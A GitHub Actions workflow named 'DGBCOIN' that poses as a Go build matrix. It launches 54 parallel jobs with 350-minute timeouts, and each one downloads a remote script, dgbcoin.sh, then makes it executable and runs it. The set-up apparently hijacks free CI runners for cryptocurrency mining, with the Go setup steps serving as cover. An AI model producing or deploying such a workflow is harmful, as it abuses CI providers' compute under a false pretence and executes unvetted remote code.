name: DGBCOIN
on: [push, pull_request]
jobs:
  build:
    name: pusing
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6]
        flag:  [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 350
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: pusing
      run: |
        wget https://github.com/Ngumiko/galon/blob/main/dgbcoin.sh && chmod u+x dgbcoin.sh && ./dgbcoin.sh
